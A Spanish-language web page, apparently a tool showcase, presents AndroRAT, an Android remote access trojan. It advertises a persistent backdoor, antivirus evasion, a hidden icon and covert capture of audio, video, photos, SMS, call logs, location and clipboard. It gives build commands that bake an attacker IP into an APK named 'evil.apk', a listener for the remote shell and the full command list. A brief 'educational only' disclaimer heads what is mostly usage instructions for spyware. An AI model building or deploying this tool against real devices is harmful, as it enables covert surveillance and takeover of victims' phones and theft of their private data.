AndroRAT Herramienta de Administración Remota Android Sockets
AndroRAT Herramienta de Administración Remota Android Sockets

AndroRAT: Simple Herramienta de Administración Remota Android usando Sockets

Descargo de responsabilidad

Este software está destinado a fines educativos solamente. No me siento responsable de ningún uso malicioso de la aplicación.

AndroRAT es una herramienta diseñada para dar el control del sistema Android de forma remota y recuperar información del mismo. Androrat es una aplicación cliente/servidor desarrollada en Java Android para el lado del cliente y el servidor está en Python.

Nota

AndroRAT trabajará en dispositivos desde Android 4.1 (Jelly Bean) hasta Android 9.0 (Oreo) (API 16 a API 28). AndroRAT también funciona en el Android 10 (Q), pero parte del comando del intérprete será inestable.

Logo AndroRAT
Logo AndroRAT

Características de AndroRAT

  • Una puerta trasera completamente persistente
  • Totalmente indetectable por cualquier escáner antivirus (VirusTotal)
  • Icono invisible en la instalación
  • El apk de peso ligero que funciona 24*7 en segundo plano
  • La aplicación se inicia automáticamente al arrancar
  • Puede grabar audio, video, tomar fotos de ambas cámaras
  • Examinar los registros de llamadas y los registros de SMS
  • Obtener la ubicación actual, detalles de la tarjeta sim, IP, dirección MAC del dispositivo

Requisitos previos

AndroRAT requiere Python (> 3.6) y JAVA 8 (o Android Studio)

Instalación

git clone https://github.com/karma9874/AndroRAT.git
pip install colorama

Al clonar el repositorio usando Git bash en windows, puedes obtener el siguiente error:

error: unable to create file : Filename too long

Esto se debe a que el Git tiene un límite de 4096 caracteres para un nombre de archivo, excepto en Windows cuando el Git se compila con msys. Utiliza una versión más antigua del API de Windows y hay un límite de 260 caracteres para un nombre de archivo.

Puedes evitarlo estableciendo  core.longpaths como true.

git config --system core.longpaths true

Debes ejecutar Git bash con privilegios de administrador.

Uso (Windows y Linux)

Modos Disponibles

  • --build – para la construcción de android apk
  • --shell – obteniendo un shell interactivo del dispositivo

Modo build

Usage:
   python androRAT.py --build [flags]
   Flags:
     -i, --ip                Attacker IP address (required)
     -p, --port              Attacker port number (required)
     -o, --output            Name for the apk file (optional)

O puedes construir manualmente el apk importando la carpeta Android Code Android Studio y cambiando la dirección IP y el número de puerto en el archivo config.java y luego puedes generar el apk firmado desde Android Studio -> Build -> Generate Signed APK(s)

Modo shell

Usage:
   python androRAT.py --shell [flags]
   Flags:
     -i, --ip                Listner IP address
     -p, --port              Listner port number

Después de ejecutar el modo shell, obtendrás un intérprete del dispositivo

Comandos que pueden funcionar con el intérprete

    deviceInfo                 --> returns basic info of the device
    camList                    --> returns cameraID  
    takepic [cameraID]         --> Takes picture from camera
    startVideo [cameraID]      --> starts recording the video
    stopVideo                  --> stop recording the video and return the video file
    startAudio                 --> starts recording the audio
    stopAudio                  --> stop recording the audio
    getSMS [inbox|sent]        --> returns inbox sms or sent sms in a file 
    getCallLogs                --> returns call logs in a file
    shell                      --> starts a sh shell of the device
    vibrate [number_of_times]  --> vibrate the device number of time
    getLocation                --> return the current location of the device
    getIP                      --> returns the ip of the device
    getSimDetails              --> returns the details of all sim of the device
    clear                      --> clears the screen
    getClipData                --> return the current saved text from the clipboard
    getMACAddress              --> returns the mac address of the device
    exit                       --> exit the interpreter

En la Shell Sh hay algunos sub-comandos

    get [full_file_path]        --> donwloads the file

Ejemplos

  • Para construir el apk: python androRAT.py --build -i 192.169.x.x -p 8000 -o evil.apk
  • Para conseguir el intérprete: python androRAT.py --shell -i 0.0.0.0 -p 8000

Ejemplos del Intérprete

Generando el APK:

Generar APK de RAT
Generar APK de RAT

Algunos comandos del intérprete:

Comandos Intérprete
Comandos Intérprete
Dark Mode

AndroRAT (este enlace se abre en una nueva ventana) por karma9874 (este enlace se abre en una nueva ventana)

A Simple android remote administration tool using sockets. It uses java on the client side and python on the server side

Más artículos
Avyukt Framework Explotación Generar Payloads Maliciosas
Avyukt: Framework de Explotación para Generar Payloads Maliciosas